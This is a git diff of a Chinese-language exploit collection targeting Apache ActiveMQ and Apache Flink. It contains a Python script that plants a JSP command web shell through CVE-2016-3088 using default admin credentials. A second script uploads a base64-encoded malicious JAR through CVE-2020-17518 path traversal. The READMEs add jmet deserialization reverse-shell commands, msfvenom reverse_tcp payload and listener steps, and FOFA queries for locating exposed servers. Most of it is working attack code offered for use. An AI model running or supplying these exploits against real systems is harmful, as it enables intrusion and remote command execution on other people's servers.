部分POC初始化上传

Apache-ActiveMQ/ActiveMQ 反序列化漏洞（CVE-2015-5254）/README.md

@@ -0,0 +1,27 @@
+## 漏洞概述
+
+该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务（JMS）ObjectMessage对象利用该漏洞执行任意代码。
+
+## 影响范围
+
+```http
+ActiveMQ < 5.13.0
+```
+
+## EXP
+
+1、确定目标开启61616端口
+
+```bash
+ nmap -sV -Pn -T4 -sC -p 61616 IP
+```
+
+2、发送反弹payload
+
+```bash
+java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "反弹shell命令" -Yp target-IP 61616
+```
+
+3、点击触发Browse event-Message ID ，成功反弹
+
+[http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event](http://ip:8161/admin/message.jsp?id=ID&JMSDestination=event)

Apache-ActiveMQ/ActiveMQ任意文件写入漏洞（CVE-2016-3088）/CVE-2016-3088.py

@@ -0,0 +1,84 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#Author:gshell
+
+import requests
+import os
+import sys
+import re
+
+headers = {
+    "Authorization": "Basic YWRtaW46YWRtaW4=",
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+    "Accept-Encoding": "gzip, deflate",
+    "DNT": "1",
+    "Connection": "close",
+    "Upgrade-Insecure-Requests": "1",
+    "Content-Type": "application/x-www-form-urlencoded"
+    }
+
+def check(url):
+    url1 = url + "/fileserver/a../../%08/..%08/.%08/%08"
+    try:
+        r1 = requests.put(url=url1,headers=headers, allow_redirects=False, timeout=5)
+        if r1.status_code == 500:
+            path = re.findall(r"(.*)fileserver",r1.reason)[0]
+            print('ActiveMQ_put_path：'+path)
+            #print('{}：put ok'.format(url))
+            url2 = url + "/fileserver/guo.txt"
+            payload = '''<%
+    if("gshell".equals(request.getParameter("pwd"))){
+        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("shell")).getInputStream();
+        int a = -1;
+        byte[] b = new byte[2048];
+        out.print("<pre>");
+        while((a=in.read(b))!=-1){
+            out.println(new String(b));
+        }
+        out.print("</pre>");
+    }
+%>
+''' 
+            r2 = requests.put(url=url2,headers=headers, data=payload, allow_redirects=False, timeout=5)
+            if r2.status_code == 204:
+                print("ActiveMQ_put__txt：{}".format(url2))
+
+                headers_move = {
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+    "Accept-Encoding": "gzip, deflate", "Authorization": "Basic YWRtaW46YWRtaW4=",
+    "Destination": "file://"+path+"admin/guo.jsp",
+    "Connection": "close",
+    "Upgrade-Insecure-Requests": "1",
+    "Cache-Control": "max-age=0"}
+                r3 = requests.request('MOVE', url=url2, headers=headers_move, allow_redirects=False, timeout=5)
+                # print(r3.status_code)
+                if r3.status_code == 204:
+                    print("ActiveMQ_putshell：{}".format(url+'/admin/guo.jsp'))
+            else:
+                pass
+    except:
+        pass
+
+if __name__ == '__main__':
+    print('''
+  ____                       _            _  _ 
+ |  _ \                     | |          | || |
+ | |_) | _   _    __ _  ___ | |__    ___ | || |
+ |  _ < | | | |  / _` |/ __|| '_ \  / _ \| || |
+ | |_) || |_| | | (_| |\__ \| | | ||  __/| || |
+ |____/  \__, |  \__, ||___/|_| |_| \___||_||_|
+          __/ |   __/ |                        
+         |___/   |___/
+        ''')
+
+    argvs = sys.argv
+    if len(argvs) < 2:
+        print('''usage:python ActiveMQ_putshell.py -u url''')
+        os._exit(0)
+
+    if "-u" in argvs:
+        check(argvs[2])

Apache-ActiveMQ/ActiveMQ任意文件写入漏洞（CVE-2016-3088）/README.md

@@ -0,0 +1,16 @@
+## 漏洞概述
+
+ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录
+
+## 影响范围
+
+```http
+ActiveMQ 5.x ~ 5.14.0
+```
+
+## EXP
+
+```bash
+python CVE-2016-3088.py -u http://xx.com
+```
+

Apache-ActiveMQ/README.md

@@ -1,2 +1,23 @@
 ## 应用介绍
-Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。
+
+![](logo.png)
+
+Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。
+
+登陆后台确定版本： [http://IP:8161](http://ip:8161/)
+
+官方网站：https://activemq.apache.org
+
+默认用户：admin/admin
+
+## 相关资产
+
+FOFA
+
+```http
+app="APACHE-ActiveMQ"
+```
+
+## 环境搭建
+
+[使用Docker安装配置ActiveMQ](https://www.cnblogs.com/yeyeck/p/12606484.html)

Apache-Flink/Apache-Flink-Jar Upload RCE/README.md → Apache-Flink/Apache-Flink 1.9.1 Jar Upload RCE/README.md

@@ -4,7 +4,6 @@ Apache Flink 1.9.x 恶意JAR包上传，导致任意命令执行，反弹shell
 ## 影响范围
 ```http
 版本：<= 1.9.1
-FOFA: app="APACHE-Flink"
 ```
 
 ## POC

Apache-Flink/Apache-Flink-jobmanager 目录遍历（CVE-2020-17519）/README.md

@@ -3,11 +3,9 @@ Apache Flink 1.11.0中引入的一个更改，允许攻击者通过JobManager进
 
 ## 影响范围
 ```http
-版本：
 Apache Flink 1.11.0
 Apache Flink 1.11.1
 Apache Flink 1.11.2
-FOFA: app="APACHE-Flink"
 ```
 
 ## POC

Apache-Flink/Apache-Flink-文件上传和目录遍历（CVE-2020-17518）/CVE-2020-17518.py

@@ -0,0 +1,27 @@
+import requests
+import base64
+import json
+import sys
+import io
+def main():
+    if len(sys.argv) == 1 or sys.argv[1] == '-h':
+        print('Usage :python CVE-2020-17518.py http://example.com:8081')
+        exit()
+    url = sys.argv[1]
+    jobmanager_config_dir = url + '/jobmanager/config'
+    upload_jar_url = url + "/jars/upload"
+    r1 = requests.get(jobmanager_config_dir,verify=False)
+        #data = json.loads(req.text)[2]['value']
+    data = json.loads(r1.text) 
+    for i in data:
+        #print(i['key'])
+        if i['key'] == "web.tmpdir":
+            flink_webdir = i['value']
+            print("webdir:%s" % flink_webdir)
+    file_content = base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA')
+    files = {'jarfile': ('../../../../../..%s/flink-web-upload/new123.jar' % flink_webdir,  io.BytesIO(file_content), 'application/octet-stream')}
+    r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False)
+    print('the shell:%s/jars/new123.jar/run?entry-class=Execute&program-args="command"' % url)
+
+if __name__ == "__main__":
+    main()

Apache-Flink/Apache-Flink-文件上传和目录遍历（CVE-2020-17518）/README.md

@@ -1,12 +1,10 @@
 ## 漏洞概述
-Apache Flink 1.9.x 恶意JAR包上传，导致任意命令执行，反弹shell
+Apache Flink  恶意JAR包上传，导致任意命令执行，反弹shell
 
 ## 影响范围
 ```http
-版本：
-< 1.11.3
-< 1.12.0
-FOFA: app="APACHE-Flink"
+Flink < 1.11.3
+Flink < 1.12.0
 ```
 
 ## POC
@@ -16,36 +14,28 @@ nuclei.exe -tags apache -t cves/ -stats -u http://test.com:8081
 
 ## EXP
 
+1、Py脚本
+
 ```python
-import requests
-import base64
-import json
-import sys
-import io
-def main():
-    if len(sys.argv) == 1 or sys.argv[1] == '-h':
-        print('Usage :python2 flink-getshell.py http://example.com:8081')
-        exit()
-    url = sys.argv[1]
-    jobmanager_config_dir = url + '/jobmanager/config'
-    upload_jar_url = url + "/jars/upload"
-    r1 = requests.get(jobmanager_config_dir,verify=False)
-        #data = json.loads(req.text)[2]['value']
-    data = json.loads(r1.text) 
-    for i in data:
-        #print(i['key'])
-        if i['key'] == "web.tmpdir":
-            flink_webdir = i['value']
-            print("webdir:%s" % flink_webdir)
-    file_content = base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA')
-    files = {'jarfile': ('../../../../../..%s/flink-web-upload/new123.jar' % flink_webdir,  io.BytesIO(file_content), 'application/octet-stream')}
-    r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False)
-    print('the shell:%s/jars/new123.jar/run?entry-class=Execute&program-args="command"' % url)
-
-if __name__ == "__main__":
-    main()
+python CVE-2020-17518.py http://example.com:8081
 ```
 
+2、MSF
+
+```bash
+#生成木马
+msfvenom -p java/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx  LPORT=4444 -f jar > test.jar
+
+#监听端口
+use exploit/multi/handler
+set payload java/shell/reverse_tcp
+set lhost xxx.xxx.xxx.xxx
+set lport 4444
+run
+```
+
+点击查看文件上传页面 -> 点击 Add 上传 jar 文件
+
 ## 参考链接
 
 [CVE-2020-17519 & CVE-2020-17518 分析](https://xz.aliyun.com/t/8993?page=1)

Apache-Flink/README.md

@@ -1,3 +1,21 @@
 ## 应用简介
-
- Flink 是一个开源的分布式流式处理框架(大数据)
+
+![](logo.png)
+
+Flink 是一个开源的分布式流式处理框架(大数据)
+
+官方网站：https://flink.apache.org
+
+默认账户：未授权访问
+
+## 相关资产
+
+FOFA
+
+```http
+app="APACHE-Flink"
+```
+
+## 环境搭建
+
+[使用docker快速搭建Flink](https://blog.csdn.net/chikoucha6215/article/details/100855242)